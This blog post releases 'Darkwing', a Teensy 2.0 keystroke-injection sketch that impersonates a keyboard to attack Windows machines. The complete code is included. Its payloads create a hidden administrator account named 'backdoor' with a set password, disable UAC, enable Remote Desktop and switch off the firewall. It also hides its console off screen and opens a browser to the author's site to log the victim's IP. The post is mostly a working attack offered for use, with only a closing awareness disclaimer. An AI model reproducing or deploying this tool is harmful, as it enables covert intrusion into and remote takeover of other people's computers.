The Unstoppable Windows Hacking Device

Next in a long run of Windows hacks, we have a device that can not be blocked easily via software, and is fully customizable.  The Teensy 2.0 (purchased for $18 at www.pjrc.com) is an Arduino-like microcontroller that can be programmed to act as a keyboard once plugged in.  The device and vendor IDs can be changed at will, making it extremely difficult to block it as a single device.  (I, myself, have mine identifying as an Apple Pro Keyboard - as it requires no drivers in Linux, Mac OS X, or Windows - and doesn't queue off OS X to identify an unknown keyboard.)  There is an application out there that takes inventory of your USB devices and monitors for, and blocks, new devices - but unless you have this highly obscure program running, you are likely to to fall victim to this device.

Once properly programmed (using either C++, or the Arduino IDE), the Teensy can spew text as a normal keyboard would - but it can do it at rates much higher than anyone can accurately type.  Entire batch scripts, full sets of commands, and anything else you can think of (including mouse movements) can be programmed in.  Using this method, you can open a back door right in to any Windows machine (or Mac or Linux box - although they are somewhat more difficult, due to the inherent security mechanisms built in... we'll take a look at those at a later date.  They require a bit of social engineering.)

The following is a script I've put together called Darkwing.  (Named after the duck, of course, and because, until recently, my Teensy has been housed inside of a rubber duck squeaky toy as first designed by Hak5's Darren Kitchen.)

  1.  
  2. // Darkwing v0.1
  3. // USB Ducky Framework for the Teensy 2.0
  4. // by HaDAk
  5. // for the Hak.5 Community -- please contribute, distribute, and credit!
  6.  
  7. // Variables
  8. int blinkcount = 0;
  9.  
  10. // OS X payloads
  11. char* osx_ips = "ifconfig";
  12.  
  13. // *nix payloads
  14. char* nix_ips = "ifconfig";
  15.  
  16. // Windows Payloads
  17. // Add user "backdoor" with password "p@$$w0rd",
  18. // add to the local admin group, and hide from the login screen
  19. char* win_adduser = "net user backdoor p@$$w0rd /add && REG ADD \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\" /V backdoor /T REG_DWORD /F /D \"0\" && net localgroup \"Administrators\" backdoor /ADD";
  20. // Disable UAC
  21. char* win_disableuac = "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /v EnableLUA /t REG_DWORD /d 0 /f";
  22. // Enable Remote Desktop
  23. char* win_enablerdp = "REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f";
  24. // Disable Windows Firewall
  25. char* win_disablefirewall = "netsh firewall set opmode disable";
  26. // Launch their browser to your favorite website -- I use this to collect their IP and other system metrics
  27. char* win_launchwebsite = "start /min www.hadak.org/pwnd-by-a-ducky";
  28.  
  29. void setup() {
  30. // Blink when the ducky is first plugged in, to verify power to it.
  31. while(blinkcount < 2){
  32. blink(50);
  33. blinkcount++;
  34. }
  35. // Windows generally needs a longer delay to enumerate the device.  3000ms is
  36. // typically sufficient, depending on the speed of the machine. Additionally,
  37. // the first time the device is plugged it, Windows will need a while to
  38. // install drivers.  To avoid a really high delay, I recommend unplugging the
  39. // Ducky, letting Windows install the drivers, then replugging it.
  40. // The value will probably vary by machine, so experiment to find what works.
  41. delay(3000);
  42. blink(50);
  43. RunWinUACCommand("cmd /Q /D /T:7F /F:OFF /V:OFF /K \"@echo off && mode con:RATE=31 DELAY=0 && mode con:COLS=15 LINES=1 && title . && cls\""); // Vile's better command line: http://www.hak5.org/forums/index.php?showtopic=16505
  44. //RunGnomeKDECommand("xterm");     // Linux (Gnome/KDE) command line example
  45. //RunOSXCommand("Terminal.app");   // OS X Command line example
  46. delay(500);
  47.  
  48. // Move window off screen
  49. win_MoveWindow();
  50.  
  51. // Administer payload(s)
  52. Keyboard.print(win_disableuac);
  53. enter();
  54. Keyboard.print(win_adduser);
  55. enter();
  56. Keyboard.print(win_enablerdp);
  57. enter();
  58. Keyboard.print(win_disablefirewall);
  59. enter();
  60. Keyboard.print(win_launchwebsite);
  61. enter();
  62. Keyboard.print("exit");
  63. enter();
  64.  
  65. }
  66.  
  67. void loop() {
  68. blink(400);
  69. }
  70.  
  71. void blink(int time){
  72. pinMode( PIN_D6, OUTPUT );    // set LED to super bright
  73. digitalWrite(PIN_D6, HIGH);   // LED on
  74. delay(time);                  // Slow blink
  75. digitalWrite(PIN_D6, LOW);    // LED off
  76. delay(time);
  77. }
  78.  
  79. void enter(){ // Press the enter key, and release it
  80. Keyboard.set_key1(KEY_ENTER);
  81. Keyboard.send_now();
  82. Keyboard.set_key1(0);
  83. Keyboard.send_now();
  84. }
  85.  
  86. void RunGnomeKDECommand(char *cmd){
  87. Keyboard.set_modifier(MODIFIERKEY_ALT);
  88. Keyboard.set_key1(KEY_F2);
  89. Keyboard.send_now();
  90. Keyboard.set_modifier(0);
  91. Keyboard.set_key1(0);
  92. Keyboard.send_now();
  93. delay(500);
  94. Keyboard.print(cmd);
  95. enter();
  96. }
  97.  
  98. void RunOSXCommand(char *cmd){
  99. Keyboard.set_modifier(MODIFIERKEY_GUI);
  100. Keyboard.set_key1(KEY_SPACE);
  101. Keyboard.send_now();
  102. Keyboard.set_modifier(0);
  103. Keyboard.set_key1(0);
  104. Keyboard.send_now();
  105. delay(500);
  106. Keyboard.print(cmd);
  107. delay(500);
  108. enter();
  109. }
  110.  
  111. void RunWindowsCommand(char *cmd){
  112. Keyboard.set_modifier(MODIFIERKEY_GUI);
  113. Keyboard.set_key1(KEY_R);
  114. Keyboard.send_now();
  115. Keyboard.set_modifier(0);
  116. Keyboard.set_key1(0);
  117. Keyboard.send_now();
  118. delay(500);
  119. Keyboard.print(cmd);
  120. enter();
  121. }
  122.  
  123. void RunWinUACCommand(char *cmd){
  124. Keyboard.set_modifier(MODIFIERKEY_GUI);
  125. Keyboard.set_key1(KEY_R);
  126. Keyboard.send_now();
  127. Keyboard.set_modifier(0);
  128. Keyboard.set_key1(0);
  129. Keyboard.send_now();
  130. delay(50);
  131. Keyboard.print(cmd);
  132. Keyboard.set_modifier(MODIFIERKEY_CTRL|MODIFIERKEY_SHIFT);
  133. Keyboard.send_now();
  134. enter();
  135. Keyboard.set_modifier(0);
  136. Keyboard.send_now();
  137. delay(500);
  138. Keyboard.set_modifier(KEY_RIGHT);
  139. Keyboard.send_now();
  140. Keyboard.set_modifier(0);
  141. Keyboard.send_now();
  142. enter();
  143. }
  144.  
  145. void win_MoveWindow(){
  146. int move = 0;
  147. Keyboard.set_modifier(MODIFIERKEY_ALT);
  148. Keyboard.set_key1(KEY_SPACE);
  149. Keyboard.send_now();
  150. Keyboard.set_modifier(0);
  151. Keyboard.set_key1(0);
  152. Keyboard.send_now();
  153. Keyboard.print("m");
  154. while(move < 250){
  155. Keyboard.set_key1(KEY_DOWN);
  156. Keyboard.send_now();
  157. Keyboard.set_key1(0);
  158. Keyboard.send_now();
  159. move++;
  160. }
  161. enter();
  162. }
  163.  

Darkwing contains several functions to make your life much easier when writing scripts.  There are included functions for things such as opening a UAC command line in Windows Vista and 7, moving a window to the bottom of the screen, so it's out of sight, and running applications in Windows, Mac OS X, and Linux (Gnome and KDE - or whatever else uses the Alt+F2 launcher).

The payloads included with Darkwing will add an administrative user to Windows, hide it from the login screen, disable the firewall, disable UAC, and enable remote desktop.  A future revision of this script will reside in a Windows script with several executables, but that's a post for another day.

For now, I am releasing the current incarnation of my script into the wild with the same disclaimer as always: this hack is meant to raise awareness of the inherent insecurities of computer systems, particularly Windows, and ideally to nudge Microsoft into creating a more secure computing environment.  Please do NOT use this script or any information here for illegal purposes, as I am NOT responsible for your actions.

Be Sociable, Share!

Leave a Reply